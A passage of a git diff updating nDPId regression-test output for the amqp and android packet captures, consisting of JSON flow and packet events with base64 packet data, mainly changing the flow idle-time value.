-00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904169152,"flow_last_seen":1490904169152,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1490904169152,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1490904169152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1490904169152,"pkt":"AAAAAAAAAAAAAAAACABFAABTPztAAEAG\/Gd\/AAABfwABAayuFiiKm04N2t+K4IAYAV7\/RwAAAQEICgC+2LgAvtO2AQABAAAAFwA8ACgAAAdkZWZhdWx0B3Rhc2tzLiMAzg=="} -00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904169152,"flow_last_seen":1490904169152,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1490904169152,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1490904169152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490904169152,"pkt":"AAAAAAAAAAAAAAAACABFAAA01sFAAEAGZQB\/AAEBfwAAARYorK7a34rgiptOLIAQDAj\/KAAAAQEICgC+2LgAvti4"} -00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1490904169152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1490904169152,"pkt":"AAAAAAAAAAAAAAAACABFAADAPzxAAEAG+\/l\/AAABfwABAayuFiiKm04s2t+K4IAYAV7\/tAAAAQEICgC+2LgAvti4AgABAAAAhAA8AAAAAAAAAAAA7v4AHmFwcGxpY2F0aW9uL3gtcHl0aG9uLXNlcmlhbGl6ZQZiaW5hcnkAAAAAAgAkZjMzYWFlMjctNjlmNC00ZjQ4LWIwYmMtMmVmZGM0NTVjMTI4JGFiZjI3YmI1LTAxNDktM2RiZC1hMmRiLWQzNTcyYzMwOTc5MM4="} -00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490904166119,"flow_last_seen":1490904169156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":1342,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1490904169156,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} -00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1490904166119,"flow_last_seen":1490904170242,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":3574,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} -00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":108,"flow_first_seen":1490904166118,"flow_last_seen":1490904170243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":7295,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} -00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490904169152,"flow_last_seen":1490904170195,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":2085,"flow_avg_l4_payload_len":69,"midstream":1,"thread_ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} +00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904166118,"flow_last_seen":1490904166118,"flow_idle_time":7560000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1490904166118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1490904166118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1490904166118,"pkt":"AAAAAAAAAAAAAAAACABFAABdxi1AAEAGdWt\/AAABfwABAaytFihPdGXjNxAmEoAYAV7\/UQAAAQEICgC+1cIAvtPNAQABAAAAIQA8ACgAAAhjZWxlcnlldhB3b3JrZXIuaGVhcnRiZWF0AM4="} +00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904166118,"flow_last_seen":1490904166118,"flow_idle_time":7560000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1490904166118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1490904166118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490904166118,"pkt":"AAAAAAAAAAAAAAAACABFAAA0puJAAEAGlN9\/AAEBfwAAARYorK03ECYST3RmDIAQSfD\/KAAAAQEICgC+1cIAvtXC"} +00595{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1490904166119,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":162,"pkt_l4_len":128,"thread_ts_msec":1490904166119,"pkt":"AAAAAAAAAAAAAAAACABFAACUxi5AAEAGdTN\/AAABfwABAaytFihPdGYMNxAmEoAYAV7\/iAAAAQEICgC+1cIAvtXCAgABAAAAWAA8AAAAAAAAAAABJ\/gAEGFwcGxpY2F0aW9uL2pzb24FdXRmLTgAAAAtCGhvc3RuYW1lUwAAAB9jZWxlcnlAdGVzdC5jb2duaXRvbmV0d29ya3MuY29tAgDO"} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904166119,"flow_last_seen":1490904166119,"flow_idle_time":7560000,"flow_min_l4_payload_len":448,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":448,"flow_avg_l4_payload_len":448,"midstream":1,"thread_ts_msec":1490904166119,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01065{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1490904166119,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":514,"pkt_l4_len":480,"thread_ts_msec":1490904166119,"pkt":"AAAAAAAAAAAAAAAACABFAAH0AQRAAEAGOP5\/AAEBfwAAARYorKyekqFfoHNnjIAYAXcA6QAAAQEICgC+1cIAvtPXAQADAAAAKQA8ADwBMwAAAAAAAGF2AAhjZWxlcnlldhB3b3JrZXIuaGVhcnRiZWF0zgIAAwAAAFgAPAAAAAAAAAAAASf4ABBhcHBsaWNhdGlvbi9qc29uBXV0Zi04AAAALQhob3N0bmFtZVMAAAAfY2VsZXJ5QHRlc3QuY29nbml0b25ldHdvcmtzLmNvbQIAzgMAAwAAASd7InN3X3N5cyI6ICJMaW51eCIsICJjbG9jayI6IDM5MTcyNSwgInRpbWVzdGFtcCI6IDE0OTA5MDQxNjYuMTE4NTgzLCAiaG9zdG5hbWUiOiAiY2VsZXJ5QHRlc3QuY29nbml0b25ldHdvcmtzLmNvbSIsICJwaWQiOiAxODk0LCAic3dfdmVyIjogIjMuMS4xOCIsICJ1dGNvZmZzZXQiOiAwLCAibG9hZGF2ZyI6IFswLjc4LCAwLjU2LCAwLjQyXSwgInByb2Nlc3NlZCI6IDExMzk0MiwgImFjdGl2ZSI6IDAsICJmcmVxIjogMi4wLCAidHlwZSI6ICJ3b3JrZXItaGVhcnRiZWF0IiwgInN3X2lkZW50IjogInB5LWNlbGVyeSJ9zg=="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1490904166119,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490904166119,"pkt":"AAAAAAAAAAAAAAAACABFAAA0HMNAAEAGHv9\/AAABfwABAaysFiigc2eMnpKjH4AQDjX\/KAAAAQEICgC+1cIAvtXC"} +01066{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1490904168121,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":514,"pkt_l4_len":480,"thread_ts_msec":1490904168121,"pkt":"AAAAAAAAAAAAAAAACABFAAH0AQVAAEAGOP1\/AAEBfwAAARYorKyekqMfoHNnjIAYAXcA6QAAAQEICgC+17YAvtXCAQADAAAAKQA8ADwBMwAAAAAAAGF3AAhjZWxlcnlldhB3b3JrZXIuaGVhcnRiZWF0zgIAAwAAAFgAPAAAAAAAAAAAASf4ABBhcHBsaWNhdGlvbi9qc29uBXV0Zi04AAAALQhob3N0bmFtZVMAAAAfY2VsZXJ5QHRlc3QuY29nbml0b25ldHdvcmtzLmNvbQIAzgMAAwAAASd7InN3X3N5cyI6ICJMaW51eCIsICJjbG9jayI6IDM5MTcyNywgInRpbWVzdGFtcCI6IDE0OTA5MDQxNjguMTIwNTc2LCAiaG9zdG5hbWUiOiAiY2VsZXJ5QHRlc3QuY29nbml0b25ldHdvcmtzLmNvbSIsICJwaWQiOiAxODk0LCAic3dfdmVyIjogIjMuMS4xOCIsICJ1dGNvZmZzZXQiOiAwLCAibG9hZGF2ZyI6IFswLjc4LCAwLjU2LCAwLjQyXSwgInByb2Nlc3NlZCI6IDExMzk0MiwgImFjdGl2ZSI6IDAsICJmcmVxIjogMi4wLCAidHlwZSI6ICJ3b3JrZXItaGVhcnRiZWF0IiwgInN3X2lkZW50IjogInB5LWNlbGVyeSJ9zg=="} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904169152,"flow_last_seen":1490904169152,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1490904169152,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1490904169152,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1490904169152,"pkt":"AAAAAAAAAAAAAAAACABFAABTPztAAEAG\/Gd\/AAABfwABAayuFiiKm04N2t+K4IAYAV7\/RwAAAQEICgC+2LgAvtO2AQABAAAAFwA8ACgAAAdkZWZhdWx0B3Rhc2tzLiMAzg=="} +00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904169152,"flow_last_seen":1490904169152,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1490904169152,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1490904169152,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490904169152,"pkt":"AAAAAAAAAAAAAAAACABFAAA01sFAAEAGZQB\/AAEBfwAAARYorK7a34rgiptOLIAQDAj\/KAAAAQEICgC+2LgAvti4"} +00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1490904169152,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1490904169152,"pkt":"AAAAAAAAAAAAAAAACABFAADAPzxAAEAG+\/l\/AAABfwABAayuFiiKm04s2t+K4IAYAV7\/tAAAAQEICgC+2LgAvti4AgABAAAAhAA8AAAAAAAAAAAA7v4AHmFwcGxpY2F0aW9uL3gtcHl0aG9uLXNlcmlhbGl6ZQZiaW5hcnkAAAAAAgAkZjMzYWFlMjctNjlmNC00ZjQ4LWIwYmMtMmVmZGM0NTVjMTI4JGFiZjI3YmI1LTAxNDktM2RiZC1hMmRiLWQzNTcyYzMwOTc5MM4="} +00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490904166119,"flow_last_seen":1490904169156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":1342,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1490904169156,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} +00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1490904166119,"flow_last_seen":1490904170242,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":3574,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} +00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":108,"flow_first_seen":1490904166118,"flow_last_seen":1490904170243,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":7295,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} +00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490904169152,"flow_last_seen":1490904170195,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":2085,"flow_avg_l4_payload_len":69,"midstream":1,"thread_ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","packets-captured":160,"packets-processed":160,"total-skipped-flows":0,"total-l4-data-len":12954,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1490904170243} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 160/160 diff --git a/test/results/android.pcap.out b/test/results/android.pcap.out index 3931cbf0f..0f342fa06 100644 --- a/test/results/android.pcap.out +++ b/test/results/android.pcap.out @@ -1,23 +1,23 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"android.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"android.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1582454769772} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454769772,"flow_last_seen":1582454769772,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1582454769772,"l3_proto":"ip4","src_ip":"95.101.24.53","dst_ip":"192.168.2.17","src_port":443,"dst_port":50677,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1582454769772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1582454769772,"pkt":"xGGLNYKpxiwDYGpkCABFAABMMy4AADUGGCtfZRg1wKgCEQG7xfVNnd4qbhnKg4AYAUXNDgAAAQEICmx+XigR4ZkoFwMDABMwxZA0Xbk6ucnG2OFNZYAG8R1y"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454779631,"flow_last_seen":1582454779631,"flow_idle_time":7440000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1582454779631,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1582454779631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1582454779631,"pkt":"xGGLNYKpxiwDYGpkCABFAgBirQcAAC4GWpAR+LBLwKgCEQG7xZj0WotEsqX09IAYBCokkgAAAQEIClsVyooR3+x3FwMDACkAAAAAAAAABGgk1MfD1SR1H5v5Q6dSq6XAgQAjDJnQ9jro2uiXnku8Hg=="} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1582454779631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454779631,"pkt":"xGGLNYKpxiwDYGpkCABFAgBTrQgAAC4GWp4R+LBLwKgCEQG7xZj0WotysqX09IAZBCpyhAAAAQEIClsVyooR3+x3FQMDABoAAAAAAAAABZSZBhugqn7IvMs7ScmDJ6yQxA=="} -00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1582454779931,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1582454779931,"pkt":"xGGLNYKpxiwDYGpkCABFAACBrQkAAC4GWnER+LBLwKgCEQG7xZj0WotEsqX09IAZBCq7DgAAAQEIClsVy7YR3+x3FwMDACkAAAAAAAAABGgk1MfD1SR1H5v5Q6dSq6XAgQAjDJnQ9jro2uiXnku8HhUDAwAaAAAAAAAAAAWUmQYboKp+yLzLO0nJgyeskMQ="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454780612,"flow_last_seen":1582454780612,"flow_idle_time":7440000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1582454780612,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1582454780612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1582454780612,"pkt":"xGGLNYKpxiwDYGpkCABFAgBiArsAAC4GBN0R+LBLwKgCEQG7xZQAd+\/fhij6wYAYBTCNMgAAAQEIClsVzl8R3+\/bFwMDACkAAAAAAAAACH\/oI1Kw++l3rtTYoEdnoXbMNGznM5xRQS6qcOaP89cv8Q=="} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1582454780612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454780612,"pkt":"xGGLNYKpxiwDYGpkCABFAgBTArwAAC4GBOsR+LBLwKgCEQG7xZQAd\/ANhij6wYAZBTCw2QAAAQEIClsVzl8R3+\/bFQMDABoAAAAAAAAACeuqoxCRLc0dnl7lMGJ\/SkF\/RQ=="} -00574{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1582454780907,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1582454780907,"pkt":"xGGLNYKpxiwDYGpkCABFAACBAr0AAC4GBL4R+LBLwKgCEQG7xZQAd+\/fhij6wYAZBTC0SwAAAQEIClsVz4YR3+\/bFwMDACkAAAAAAAAACH\/oI1Kw++l3rtTYoEdnoXbMNGznM5xRQS6qcOaP89cv8RUDAwAaAAAAAAAAAAnrqqMQkS3NHZ5e5TBif0pBf0U="} 